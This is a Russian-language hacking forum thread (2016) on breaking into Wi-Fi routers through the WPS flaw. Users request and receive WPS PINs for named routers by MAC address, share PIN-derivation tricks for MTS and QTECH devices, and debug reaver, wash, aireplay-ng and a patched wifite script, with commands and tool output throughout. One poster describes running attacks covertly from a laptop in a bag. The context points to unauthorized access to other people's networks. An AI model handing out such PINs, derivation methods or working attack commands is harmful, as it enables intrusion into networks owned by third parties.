Уязвимость в протоколе Wi-Fi Protected Setup

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by gpuhash, 30 Dec 2011.

  1. atlas28

    atlas28 Active Member

    Joined:
    23 May 2015
    Messages:
    224
    Likes Received:
    173
    Reputations:
    1
    Тут еще нужно учитывать, что штыревая антенна имеет круговую направленность, т. е. точки, которые находятся над тобой и под тобой будут ловиться фигово. У меня этот эффект проявляется при использовании круговой на 9dBi. Т. е. точки, которые на других этажах в моем доме, лучше ловятся с маленькой антеннкой на 5dBi, а вот с антенной на 9dBi лучше ловятся только те точки, которые находятся на расстоянии по горизонтали. Я поначалу тоже не понимал, в чем дело, но сейчас ощущаю эффект от такой антенны, однако, направленная все равно будет лучше (но ее нужно правильно направлять).
     
  2. vedemur

    vedemur Member

    Joined:
    12 Nov 2012
    Messages:
    105
    Likes Received:
    9
    Reputations:
    0
    Согласен, спасибо, не эксперементировал.
     
  3. vedemur

    vedemur Member

    Joined:
    12 Nov 2012
    Messages:
    105
    Likes Received:
    9
    Reputations:
    0
    Разбирал, всё нормально.
     
  4. VladimirV

    VladimirV Well-Known Member

    Joined:
    1 Apr 2013
    Messages:
    1,130
    Likes Received:
    6,150
    Reputations:
    57
    Сразу не догнал. Есть тема по антеннам. Пишите там. Немного нагадили :)
    https://forum.antichat.ru/threads/80775/
     
    #3424 VladimirV, 3 May 2016
    Last edited: 3 May 2016
    resident148, atlas28 and khamyk like this.
  5. djamv

    djamv Member

    Joined:
    16 Oct 2012
    Messages:
    129
    Likes Received:
    45
    Reputations:
    0
    Читал выше что ребята откопали новый алгоритм генерации пинов для многих роутеров. Считаю что нужно сообщить данную находку нашим испанским коллегам
     
  6. GOBLIN

    GOBLIN New Member

    Joined:
    9 Sep 2015
    Messages:
    54
    Likes Received:
    2
    Reputations:
    0
    Подскажите PIN к роутеру ZTE 54:BE:53:84:4F:4E
    Спасибо
     
  7. Stefalex85

    Stefalex85 New Member

    Joined:
    4 May 2016
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Доброго дня! Подскажите пин на роутер netgear wnr2200 00:8e:f2:47:0d:ba . Dumpper подобрал первые 4 цифры - 2268, остальные не может найти
     
  8. Felis-Sapiens

    Felis-Sapiens Reservists Of Antichat

    Joined:
    21 Jul 2015
    Messages:
    616
    Likes Received:
    3,833
    Reputations:
    171
    22686534
     
    4Fun likes this.
  9. hydra

    hydra Elder - Старейшина

    Joined:
    24 Jul 2015
    Messages:
    3,345
    Likes Received:
    36,497
    Reputations:
    70
    День добрый форумчане!Тут понадобился мне скрипт wifite.py для нескольких кинетиков.
    Но проблема возникла в том,что при скане точек с активным wps, выдаёт крайне мало точек.
    Запускаю так: sudo python wifite.py --wps --pixie
    В упор не видит моего подопытного зюкселя.В то время как wash видит всё.
    Пробовал ещё модскрипт wifite-ng.Сети видит все.Но опять таки атака pixie не идёт.Висит бесконечный Waiting.....
    Если запустить pixie напрямую,то всё пучком.Пин вычисляется.
    Вот засада!Чего можно предпринять?Напрямую запускать невариант.Так как ноут в сумке."Работать" надо по SSH с планшета.
    Набирать длинные команды жуть как не удобно.И скрипт бы тут очень помог.
    P.S. При атаке --wpa сети тоже видит все.Шейки ловит нормально.
     
  10. VasiliyP

    VasiliyP Elder - Старейшина

    Joined:
    30 Aug 2011
    Messages:
    365
    Likes Received:
    676
    Reputations:
    11
    https://github.com/derv82/wifite/blob/master/wifite.py
    попробуйте строчки 1811..1813
    ---
    cmd = [program_name,
    '-f', cap_file,
    '-C'] # ignore Frame Check Sum errors
    ---
    заменить на:
    ---
    cmd = [program_name, '-f', cap_file]
    ---
    Авось поможет.
     
    quite gray, erwerr2321 and hydra like this.
  11. hydra

    hydra Elder - Старейшина

    Joined:
    24 Jul 2015
    Messages:
    3,345
    Likes Received:
    36,497
    Reputations:
    70
    Снова вы вточку!Всё заработало как надо.Теперь и точки все видит.И атака идёт.
    Огромное спасибо!
    И у меня ещё вопрос есть.
    Где в скрипте можно задавать конкретные опции риверу.А то неизвестно с какими он запускается.С -a наверное.
    Я часто использую опцию -N.Помогает.
    Вот сейчас провёл эксперимент.Запустил reaver напрямую без -N.
    sudo reaver -i wlan2mon -b 40:4A:03:77:F3:F5 -vvv -K 1 (буксует на одном месте)
    А так: sudo reaver -i wlan2mon -b 40:4A:03:77:F3:F5 -vvv -K 1 -N
    Срабатывает почти сразу.
     
    #3431 hydra, 4 May 2016
    Last edited: 4 May 2016
    quite gray likes this.
  12. VasiliyP

    VasiliyP Elder - Старейшина

    Joined:
    30 Aug 2011
    Messages:
    365
    Likes Received:
    676
    Reputations:
    11
    Запуск reaver вижу в двух местах, можно найти
    cmd = ['reaver',
    И добавить опциию
    cmd = ['reaver', '-N',
     
    quite gray, CRACK211 and hydra like this.
  13. resident148

    resident148 Member

    Joined:
    9 May 2015
    Messages:
    53
    Likes Received:
    58
    Reputations:
    2
    На волне с асусами, стал смотреть wps от роутеров 00:1F:CE:ХХ:ХХ:ХХ MTSRouter_хххххх, их впс пин это (24-bit PIN)-7. Например 59172550 | 24-bit PIN, а действительный пароль 59172543
     
    CRACK211 likes this.
  14. Felis-Sapiens

    Felis-Sapiens Reservists Of Antichat

    Joined:
    21 Jul 2015
    Messages:
    616
    Likes Received:
    3,833
    Reputations:
    171
    Точнее, не 24_bit_PIN - 7, а 24_bit_PIN(BSSID-1). Последняя цифра - это контрольная сумма, так отнимать некорректно.
     
    TOX1C, startless and binarymaster like this.
  15. _Alphavite_

    _Alphavite_ New Member

    Joined:
    6 May 2016
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Подскажите PIN от роутера QTECH , 00:1F:CE:5D:2D:7F
    Или Tp link 30:b5:c2:3e:65:de
    буду благодарен
     
    #3435 _Alphavite_, 6 May 2016
    Last edited: 6 May 2016
  16. SlNik

    SlNik Active Member

    Joined:
    7 Feb 2014
    Messages:
    323
    Likes Received:
    136
    Reputations:
    1
    По выше предложенной схеме, если верно, то будет так: 61064952
    А про это забудь.
     
    #3436 SlNik, 6 May 2016
    Last edited: 6 May 2016
  17. W@rdrive

    W@rdrive New Member

    Joined:
    8 May 2015
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    Если у ТП-Линка ESSID типа TP-LINK_65DE, попробуй поймать хендшейк и сбрутить 8 цифр. По умолчанию у них пароль=WPS, по крайней мере, мне таких немало попадалось.
     
    #3437 W@rdrive, 6 May 2016
    Last edited: 6 May 2016
  18. mybitco

    mybitco Member

    Joined:
    14 Jun 2015
    Messages:
    66
    Likes Received:
    9
    Reputations:
    0
    Помогите запустить reaver на подбор пина плс.

    Имею: ноут со встроенным Wi-Fi, внешний USB-Wi-Fi на чипсете RT3070, KALI версия январь 2016 (загрузка KALI с флешки)
    Последовательность моих действий такова:
    1. iwconfig (показывает что у меня действительно есть 2 wlan адаптера)
    2. airmon-ng check kill (убиваю все лишнее)
    3.
    root@kali:~# airmon-ng start wlan1
    PHY Interface Driver Chipset
    phy0 wlan0 iwl3945 Intel Corporation PRO/Wireless 3945ABG [Golan] (rev 02)
    phy1 wlan1 rt2800usb Ralink Technology, Corp. RT2870/RT3070
    (mac80211 monitor mode vif enabled for [phy1]wlan1 on [phy1]wlan1mon)
    (mac80211 station mode vif disabled for [phy1]wlan1)
    4. airodump-ng wlan1mon (получаю список всех доступных точек доступа)
    5. wash -i wlan1mon (так wash не работал, wash -i wlan1mon -C а так заработал)
    6.
    root@kali:~# reaver -i wlan1mon -b 00:11:22:33:44:55 -c 1 -S -L -w
    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
    mod by t6_x <[email protected]> & DataHead & Soxrok2212
    [+] Waiting for beacon from 00:11:22:33:44:55
    [!] WARNING: Failed to associate with 00:11:22:33:44:55 (ESSID: abc)
    [!] WARNING: Failed to associate with 00:11:22:33:44:55 (ESSID: abc)
    [!] WARNING: Failed to associate with 00:11:22:33:44:55 (ESSID: abc)
    ^C
    (пробовал наугад задавать аргументы к reaver , но результат не менялся пока не наткнулся в инете на такой вариант(ниже))
    reaver -i wlan1mon -c 6 -b 00:11:22:33:44:55 -v -v -A -vv
    получаю:
    [+] Switching wlan1mon to channel 6
    [+] Waiting for beacon from 64:70:02:D8:EE:0E
    [+] Associated with 64:70:02:D8:EE:0E (ESSID: interzet373)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [!] WARNING: 25 successive start failures
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    (это уже лучше смотрится, вроде хоть есть попытка отправить пин, только она длится вечно на одном месте)

    Сразу отмечу что сигнал сильный, подскажите плс возможные причины проблемы и варианты их устранения? как заставить reaver перебирать пины?
     
  19. Kevin Shindel

    Kevin Shindel Elder - Старейшина

    Joined:
    24 May 2015
    Messages:
    1,011
    Likes Received:
    1,192
    Reputations:
    62
    сначала в отдельном окне
    Code:
    aireplay-ng -1 100 -a [MAC] wlan0
    потом в отдлельном окне
    Code:
    reaver -i wlan0 -b [MAC] -vv -c [channel] -aAwSNE
     
  20. mybitco

    mybitco Member

    Joined:
    14 Jun 2015
    Messages:
    66
    Likes Received:
    9
    Reputations:
    0
    Ничего не получается, на шаге:
    Code:
    aireplay-ng -1 100 -a [MAC] wlan0
    Все по порядку, делал так:
    1. iwconfig
    2. airmon-ng check kill
    3. airmon-ng start wlan1
    4. airodump-ng wlan1mon
    5. wash -i wlan1mon -C
    6.
    root@kali:~# aireplay-ng -1 100 -a 00:11:22:33:44:55 wlan1mon
    No source MAC (-h) specified. Using the device MAC (11:11:11:11:11:11)
    17:57:14 Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 1
    17:57:24 No such BSSID available.
    Please specify an ESSID (-e).

    (добавил название сети)
    root@kali:~# aireplay-ng -1 100 -a 00:11:22:33:44:55 -e abcNetwork wlan1mon
    No source MAC (-h) specified. Using the device MAC (11:11:11:11:11:11)
    17:58:03 Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 1
    17:58:13 No such BSSID available.
    (эта сеть находится на 6 канале, но aireplay-ng это не понимает)

    (выбрал другую точку на 1 канале)
    root@kali:~# aireplay-ng -1 100 -a 00:11:22:33:44:55 wlan1mon
    No source MAC (-h) specified. Using the device MAC (11:11:11:11:11:11)
    17:49:38 Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 1
    17:49:38 Sending Authentication Request (Open System)
    ...
    17:50:08 Sending Authentication Request (Open System)
    Attack was unsuccessful. Possible reasons:

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * Try to change the number of packets (-o option).
    * The driver/card doesn't support injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * You're too far from the AP. Get closer, or lower
    the transmit rate.

    7. понимаю что уже нет смысла запускать reaver но все равно его запускаю в другом окне.
    reaver -i wlan1mon -b 00:11:22:33:44:55 -vv -c 1 -aAwSNE

    В результате все как и раньше, что делать?